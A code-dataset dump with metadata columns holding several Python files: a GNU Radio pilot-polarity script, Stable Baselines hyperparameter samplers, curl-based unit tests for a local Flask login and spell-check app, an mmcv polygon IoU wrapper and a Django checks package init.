hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
49b19e96f3c809173a2b7b532ac7c0b06d1e8b86
| 566
|
py
|
Python
|
gr-ieee802-11/utils/pilots.py
|
v1259397/cosmic-gnuradio
|
64c149520ac6a7d44179c3f4a38f38add45dd5dc
|
[
"BSD-3-Clause"
] | 2
|
2021-11-30T02:35:48.000Z
|
2021-11-30T02:53:02.000Z
|
gr-ieee802-11/utils/pilots.py
|
v1259397/cosmic-gnuradio
|
64c149520ac6a7d44179c3f4a38f38add45dd5dc
|
[
"BSD-3-Clause"
] | null | null | null |
gr-ieee802-11/utils/pilots.py
|
v1259397/cosmic-gnuradio
|
64c149520ac6a7d44179c3f4a38f38add45dd5dc
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
polarity = [
1, 1, 1, 1,-1,-1,-1, 1,-1,-1,-1,-1, 1, 1,-1, 1,
-1,-1, 1, 1,-1, 1, 1,-1, 1, 1, 1, 1, 1, 1,-1, 1,
1, 1,-1, 1, 1,-1,-1, 1, 1, 1,-1, 1,-1,-1,-1, 1,
-1, 1,-1,-1, 1,-1,-1, 1, 1, 1, 1, 1,-1,-1, 1, 1,
-1,-1, 1,-1, 1,-1, 1, 1,-1,-1,-1, 1, 1,-1,-1,-1,
-1, 1,-1,-1, 1,-1, 1, 1, 1, 1,-1, 1,-1, 1,-1, 1,
-1,-1,-1,-1,-1, 1,-1, 1, 1,-1, 1,-1, 1, 1, 1,-1,
-1, 1,-1,-1,-1, 1, 1, 1,-1,-1,-1,-1,-1,-1,-1]
print "polarity"
print tuple((x, x, x, -x) for x in polarity)
print "pattern"
print tuple((-21, -7, 7, 21) for x in range(127))
| 26.952381
| 49
| 0.411661
| 157
| 566
| 1.484076
| 0.101911
| 1.081545
| 1.609442
| 2.128755
| 0.545064
| 0.545064
| 0.545064
| 0.545064
| 0.545064
| 0.545064
| 0
| 0.299559
| 0.19788
| 566
| 20
| 50
| 28.3
| 0.213656
| 0.035336
| 0
| 0
| 0
| 0
| 0.027523
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.307692
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49d011e4bda3eda22c1efc839681db8edb7dcf3f
| 6,841
|
py
|
Python
|
rl-toolkit/sb2/hyperparams_utils_sb2.py
|
boettiger-lab/rl-toolkit
|
cbf8060c79779f134101ef1c41b4b8ee44c61e4e
|
[
"BSD-3-Clause"
] | null | null | null |
rl-toolkit/sb2/hyperparams_utils_sb2.py
|
boettiger-lab/rl-toolkit
|
cbf8060c79779f134101ef1c41b4b8ee44c61e4e
|
[
"BSD-3-Clause"
] | 1
|
2021-04-14T16:25:08.000Z
|
2021-06-08T00:50:36.000Z
|
rl-toolkit/sb2/hyperparams_utils_sb2.py
|
boettiger-lab/rl-toolkit
|
cbf8060c79779f134101ef1c41b4b8ee44c61e4e
|
[
"BSD-3-Clause"
] | null | null | null |
from stable_baselines.common.policies import LstmPolicy
def sample_ppo2_params(trial):
"""
Returns hyperparameter dicitonary to be passed to SB model
"""
# Defining hyperparameters to sample over
params = {
"batch_size": trial.suggest_categorical(
"batch_size", [8, 64, 128, 516]
),
"learning_rate": trial.suggest_loguniform("learning_rate", 1e-5, 1),
"n_steps": trial.suggest_categorical(
"n_steps", [16, 32, 64, 128, 256, 512, 1024]
),
"gamma": trial.suggest_categorical(
"gamma", [0.9, 0.95, 0.99, 0.999, 1]
),
"ent_coef": trial.suggest_loguniform("ent_coef", 1e-5, 1e1),
"cliprange": trial.suggest_categorical(
"cliprange", [0.1, 0.2, 0.3, 0.4]
),
"noptepochs": trial.suggest_categorical(
"noptepochs", [1, 5, 10, 20, 30, 50]
),
"lam": trial.suggest_categorical("lambda", [0.8, 0.9, 0.95, 1.0]),
"net_arch": trial.suggest_categorical(
"net_arch", ["small", "med", "large"]
),
"n_lstm": trial.suggest_categorical("n_lstm", [1, 3, 25, 50, 100]),
"n_envs": trial.suggest_categorical("n_envs", [4, 8, 16]),
}
# Following rl zoo
if params["n_steps"] < params["batch_size"]:
nminibatches = 1
else:
nminibatches = 4
# Mapping net_arch to actual network architectures for SB
net_arch = {
"small": dict(pi=[64, 64], vf=[64, 64]),
"med": dict(pi=[256, 256], vf=[256, 256]),
"large": dict(pi=[400, 400], vf=[400, 400]),
}[params["net_arch"]]
# Creating a custom LSTM policy
class CustomLSTMPolicy(LstmPolicy):
def __init__(
self,
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm=params["n_lstm"],
reuse=False,
**_kwargs
):
super().__init__(
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm,
reuse,
net_arch=[100, "lstm", net_arch],
layer_norm=True,
feature_extraction="mlp",
**_kwargs
)
# Deleting keys that can't be used in SB models
keys_to_delete = ["batch_size", "n_lstm", "net_arch"]
[params.pop(key) for key in keys_to_delete]
# Adding keys that will be used in SB models
params["nminibatches"] = nminibatches
return params, CustomLSTMPolicy
def sample_a2c_params(trial):
"""
Sampler for A2C hyperparams.
:param trial: (optuna.trial)
:return: (dict)
"""
params = {
"gamma": trial.suggest_categorical(
"gamma", [0.9, 0.95, 0.99, 0.999, 1]
),
"n_steps": trial.suggest_categorical(
"n_steps", [16, 32, 64, 128, 256, 512, 1024, 2048]
),
"lr_schedule": trial.suggest_categorical(
"lr_schedule", ["linear", "constant"]
),
"learning_rate": trial.suggest_loguniform("lr", 1e-5, 1),
"ent_coef": trial.suggest_uniform("ent_coef", 1e-3, 1e0),
"vf_coef": trial.suggest_uniform("vf_coef", 0, 1),
"n_lstm": trial.suggest_categorical("n_lstm", [1, 3, 25, 50, 100]),
"net_arch": trial.suggest_categorical(
"net_arch", ["small", "med", "large"]
),
"n_envs": trial.suggest_categorical("n_envs", [4, 8, 16]),
}
# Mapping net_arch to actual network architectures for SB
net_arch = {
"small": dict(pi=[64, 64], vf=[64, 64]),
"med": dict(pi=[256, 256], vf=[256, 256]),
"large": dict(pi=[400, 400], vf=[400, 400]),
}[params["net_arch"]]
# Creating a custom LSTM policy
class CustomLSTMPolicy(LstmPolicy):
def __init__(
self,
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm=params["n_lstm"],
reuse=False,
**_kwargs
):
super().__init__(
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm,
reuse,
net_arch=[100, "lstm", net_arch],
layer_norm=True,
feature_extraction="mlp",
**_kwargs
)
# Deleting keys that can't be used in SB models
keys_to_delete = ["n_lstm", "net_arch"]
[params.pop(key) for key in keys_to_delete]
return params, CustomLSTMPolicy
def sample_acktr_params(trial):
"""
Sampler for ACKTR hyperparams.
:param trial: (optuna.trial)
:return: (dict)
"""
params = {
"gamma": trial.suggest_categorical(
"gamma", [0.9, 0.95, 0.99, 0.999, 1]
),
"n_steps": trial.suggest_categorical(
"n_steps", [16, 32, 64, 128, 256, 512, 1024, 2048]
),
"lr_schedule": trial.suggest_categorical(
"lr_schedule", ["linear", "constant"]
),
"learning_rate": trial.suggest_loguniform("lr", 1e-5, 1),
"ent_coef": trial.suggest_uniform("ent_coef", 1e-3, 1e0),
"vf_coef": trial.suggest_uniform("vf_coef", 0, 1),
"n_lstm": trial.suggest_categorical("n_lstm", [1, 3, 25, 50, 100]),
"net_arch": trial.suggest_categorical(
"net_arch", ["small", "med", "large"]
),
"n_envs": trial.suggest_categorical("n_envs", [4, 8, 16]),
}
# Mapping net_arch to actual network architectures for SB
net_arch = {
"small": dict(pi=[64, 64], vf=[64, 64]),
"med": dict(pi=[256, 256], vf=[256, 256]),
"large": dict(pi=[400, 400], vf=[400, 400]),
}[params["net_arch"]]
# Creating a custom LSTM policy
class CustomLSTMPolicy(LstmPolicy):
def __init__(
self,
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm=params["n_lstm"],
reuse=False,
**_kwargs
):
super().__init__(
sess,
ob_space,
ac_space,
n_env,
n_steps,
n_batch,
n_lstm,
reuse,
net_arch=[100, "lstm", net_arch],
layer_norm=True,
feature_extraction="mlp",
**_kwargs
)
# Deleting keys that can't be used in SB models
keys_to_delete = ["n_lstm", "net_arch"]
[params.pop(key) for key in keys_to_delete]
return params, CustomLSTMPolicy
| 31.237443
| 76
| 0.511183
| 790
| 6,841
| 4.18481
| 0.174684
| 0.105263
| 0.146098
| 0.065336
| 0.823654
| 0.788869
| 0.788869
| 0.788869
| 0.788869
| 0.788869
| 0
| 0.071121
| 0.354627
| 6,841
| 218
| 77
| 31.380734
| 0.67769
| 0.103347
| 0
| 0.853107
| 0
| 0
| 0.113018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.00565
| 0
| 0.073446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49d8a7a0a0d530e36471af32e8c98c3cbe5e73ef
| 13,819
|
py
|
Python
|
curltest.py
|
crazyzete/AppSecAssignment2
|
a5520738e6c5924b94f69980eba49a565c2561d7
|
[
"MIT"
] | null | null | null |
curltest.py
|
crazyzete/AppSecAssignment2
|
a5520738e6c5924b94f69980eba49a565c2561d7
|
[
"MIT"
] | 1
|
2021-02-08T20:34:54.000Z
|
2021-02-08T20:34:54.000Z
|
curltest.py
|
crazyzete/AppSecAssignment3
|
ddf4eb929bc191807668a0fc32e49373636dfd25
|
[
"MIT"
] | 1
|
2020-11-04T06:48:34.000Z
|
2020-11-04T06:48:34.000Z
|
import time
import unittest
import subprocess
from bs4 import BeautifulSoup
class MyTestCase(unittest.TestCase):
uname = "Matthew"
pword = "test"
twofa = "123456789"
def tearDown(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt',
'http://127.0.0.1:5000/logout'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
# Test Case Verifies Login Fails
def test_login_fail(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "pfail&pword=" + self.pword + "&twofa" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
self.assertEqual('User Login', soup.title.string)
postString = "uname=" + self.uname + "pfail&pword=" + self.pword + "wrong&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='result')
self.assertEqual('Login Result Display', soup.title.string)
self.assertIsNotNone(success)
self.assertEqual("incorrect", success.get_text().lower().strip())
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
self.assertEqual('User Login', soup.title.string)
postString = "uname=" + self.uname + "pfail&pword=" + self.pword + "&twofa=" + self.twofa + "999&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='result')
self.assertEqual('Login Result Display', soup.title.string)
self.assertIsNotNone(success)
self.assertEqual("two-factor failure", success.get_text().lower().strip())
#Test Case Verifies Register Form returned by verifying
def test_register_form(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertIsNotNone(soup.find(id='uname'))
self.assertIsNotNone(soup.find(id='pword'))
self.assertIsNotNone(soup.find(id='2fa'))
self.assertEqual('User Registration', soup.title.string)
# Test Case Verifies Register Failure
def test_register_failure(self):
process = subprocess.run(
['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True,
stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertEqual('User Registration', soup.title.string)
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "2&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
process = subprocess.run(
['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True,
stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertEqual('User Registration', soup.title.string)
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "2&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='success')
self.assertIsNotNone(success)
self.assertEqual("failure", success.get_text().lower().strip())
#Test Case Verifies Register Success
def test_register_success(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertEqual('User Registration', soup.title.string)
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='success')
self.assertIsNotNone(success)
self.assertEqual("success", success.get_text().lower().strip())
#Test Case Verifies Login Success
def test_login_success(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "3&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
self.assertEqual('User Login', soup.title.string)
postString = "uname=" + self.uname + "3&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='result')
self.assertEqual('Login Result Display', soup.title.string)
self.assertIsNotNone(success)
self.assertEqual("success", success.get_text().lower().strip())
#Test Case Verifies Spell Check Success
def test_login_spell_check_successs(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/register'], check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
postString = "uname=" + self.uname + "4&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/register'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', 'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
self.assertEqual('User Login', soup.title.string)
postString = "uname=" + self.uname + "4&pword=" + self.pword + "&twofa=" + self.twofa + "&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/login'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
success = soup.find(id='result')
self.assertEqual('Login Result Display', soup.title.string)
self.assertIsNotNone(success)
self.assertEqual("success", success.get_text().lower().strip())
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt',
'http://127.0.0.1:5000/spell_check'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
csrfToken = soup.find(id='csrf_token')['value']
self.assertEqual('Spell Check', soup.title.string)
postString = "inputtext=Take a sad sogn and make it betta&csrf_token=" + csrfToken
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt', '-d', postString,
'http://127.0.0.1:5000/spell_check'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertEqual('Spell Check Results', soup.title.string)
misspelled = soup.find(id='misspelled')
self.assertIsNotNone(misspelled)
self.assertEqual("sogn, betta", misspelled.get_text().strip())
textout = soup.find(id='textout')
self.assertIsNotNone(textout)
self.assertEqual("Take a sad sogn and make it betta", textout.get_text().strip())
#Test Case Verifies Spell Check Fail No Login
def test_login_spell_check_fail_no_login(self):
process = subprocess.run(['curl', '-b', 'cookies.txt', '-c', 'cookies.txt',
'http://127.0.0.1:5000/spell_check'],
check=True, stdout=subprocess.PIPE,
universal_newlines=True)
output = process.stdout
soup = BeautifulSoup(output, features='html.parser')
self.assertEqual('Redirecting...', soup.title.string)
if __name__ == '__main__':
unittest.main()
| 48.658451
| 154
| 0.552934
| 1,435
| 13,819
| 5.264808
| 0.072474
| 0.066181
| 0.066181
| 0.079418
| 0.90814
| 0.888418
| 0.882991
| 0.876903
| 0.863402
| 0.863402
| 0
| 0.027746
| 0.295825
| 13,819
| 283
| 155
| 48.830389
| 0.748638
| 0.019466
| 0
| 0.808612
| 0
| 0
| 0.200857
| 0
| 0
| 0
| 0
| 0
| 0.162679
| 1
| 0.038278
| false
| 0
| 0.019139
| 0
| 0.076555
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b72b6cbb462512ee212946e4398898017d16902d
| 171
|
py
|
Python
|
mmcv/ops/polygon_geo.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/polygon_geo.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
mmcv/ops/polygon_geo.py
|
liuyanyi/mmcv
|
f021af6000a52ad3108873f124d89dad93512863
|
[
"Apache-2.0"
] | null | null | null |
from ..utils import ext_loader
ext_module = ext_loader.load_ext('_ext', ['polygon_iou'])
def polygon_iou(poly1, poly2):
return ext_module.polygon_iou(poly1, poly2)
| 21.375
| 57
| 0.754386
| 26
| 171
| 4.615385
| 0.5
| 0.25
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.122807
| 171
| 7
| 58
| 24.428571
| 0.773333
| 0
| 0
| 0
| 0
| 0
| 0.087719
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
3fbc5f931df5ad9255b06a4ceff120398f327c11
| 197
|
py
|
Python
|
src/extra_checks/checks/__init__.py
|
kalekseev/django-extra-checks
|
fd94f21d27205676ac247796dbdb0f78692e626b
|
[
"MIT"
] | 84
|
2020-06-16T00:41:31.000Z
|
2022-03-23T19:40:25.000Z
|
src/extra_checks/checks/__init__.py
|
sobolevn/django-extra-checks
|
42954175cc57de2ea0a42448cb15ef77c9040cd0
|
[
"MIT"
] | 19
|
2020-07-02T02:24:22.000Z
|
2021-11-21T19:01:59.000Z
|
src/extra_checks/checks/__init__.py
|
sobolevn/django-extra-checks
|
42954175cc57de2ea0a42448cb15ef77c9040cd0
|
[
"MIT"
] | 4
|
2020-07-02T10:07:07.000Z
|
2022-02-15T11:06:37.000Z
|
from .model_checks import * # noqa
from .model_field_checks import * # noqa
from .self_checks import * # noqa
try:
from .drf_serializer_checks import * # noqa
except ImportError:
pass
| 21.888889
| 48
| 0.720812
| 26
| 197
| 5.230769
| 0.5
| 0.352941
| 0.470588
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208122
| 197
| 8
| 49
| 24.625
| 0.871795
| 0.096447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.142857
| 0.714286
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
b2057a53f3ce984e6f7d39b4031465f1978edd5f
| 37
|
py
|
Python
|
MeiTuan/__init__.py
|
ylyzty/leecode_study
|
8ea3c378a8d06f9f376ec57a553cf61592e3e1f5
|
[
"MIT"
] | null | null | null |
MeiTuan/__init__.py
|
ylyzty/leecode_study
|
8ea3c378a8d06f9f376ec57a553cf61592e3e1f5
|
[
"MIT"
] | null | null | null |
MeiTuan/__init__.py
|
ylyzty/leecode_study
|
8ea3c378a8d06f9f376ec57a553cf61592e3e1f5
|
[
"MIT"
] | null | null | null |
# Author: LZY
# Time: 2022/3/3 20:48
| 12.333333
| 22
| 0.621622
| 8
| 37
| 2.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0.189189
| 37
| 2
| 23
| 18.5
| 0.433333
| 0.864865
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
